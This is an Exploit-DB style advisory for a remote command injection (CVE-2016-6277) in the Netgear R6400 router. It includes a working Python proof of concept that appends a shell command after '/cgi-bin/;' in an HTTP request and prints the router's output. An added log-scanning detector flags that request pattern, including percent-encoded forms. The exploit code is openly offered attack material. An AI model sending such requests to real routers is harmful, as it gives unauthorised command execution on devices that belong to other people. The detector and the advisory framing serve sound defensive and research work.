Vendor: R6400
By: Kevin Randall
CVSS: 8.8 HIGH
Remote Code Execution
CWE: 78
Product Name: R6400
Affected Version From: V1.0.7.2_1.1.93
Affected Version To: V1.0.7.2_1.1.93
Patch Exists: YES
Related CVE: CVE-2016-6277
CPE: h:netgear:r6400
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Netgear R6400 – Remote Code Execution

This exploit allows an attacker to execute arbitrary code on the vulnerable Netgear R6400 router. The exploit is triggered by sending a specially crafted HTTP request to the router's web server. The request contains a command that is executed on the router. The output of the command is then returned to the attacker.

Mitigation:

Netgear has released a patch to address this vulnerability.

Exploit-DB raw data:

# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

# PoC

#!/usr/bin/python

import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url = FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()
spl_word =  "}"
formattedoutput = commandoutput
result = formattedoutput.rpartition(spl_word)[2]
print result
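
A detection-side companion to the PoC above, added here as an example and not part of the original Exploit-DB entry: it scans HTTP access logs for the `/cgi-bin/;<command>` request shape the PoC sends, including percent-encoded forms of the semicolon. It assumes Common Log Format lines from a proxy or sensor in front of the router's web interface; the sample log lines, function names and the `status.cgi` path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [14/Dec/2019:10:00:01 +0000] "GET /cgi-bin/;date HTTP/1.1" 200 512
192.168.1.51 - - [14/Dec/2019:10:00:05 +0000] "GET /start.htm HTTP/1.1" 200 4096
192.168.1.52 - - [14/Dec/2019:10:00:09 +0000] "GET /cgi-bin/%3Bdate HTTP/1.1" 200 512
192.168.1.53 - - [14/Dec/2019:10:00:12 +0000] "GET /cgi-bin/status.cgi?op=1 HTTP/1.1" 200 128
192.168.1.54 - - [14/Dec/2019:10:00:15 +0000] "GET /cgi-bin/%253Bdate HTTP/1.1" 404 0
"""

# client, timestamp, method, request target, status from a CLF line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')
# Request shape from the PoC: the path "/cgi-bin/;" followed by the command text.
INJECT_RE = re.compile(r'^/cgi-bin/;(.*)$', re.S)

def fully_decode(target, max_rounds=3):
    """Percent-decode repeatedly so %3B and %253B both surface as ';'."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def find_injection_attempts(log_text):
    """Return one record per request whose decoded target starts with /cgi-bin/;"""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        client, when, _method, target, status = m.groups()
        inj = INJECT_RE.match(fully_decode(target))
        if inj:
            hits.append({"client": client, "time": when,
                         "command": inj.group(1), "status": int(status)})
    return hits

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(hit)
```

The logged status code helps triage: a flagged request answered with a success status deserves a closer look at the device than one that was rejected.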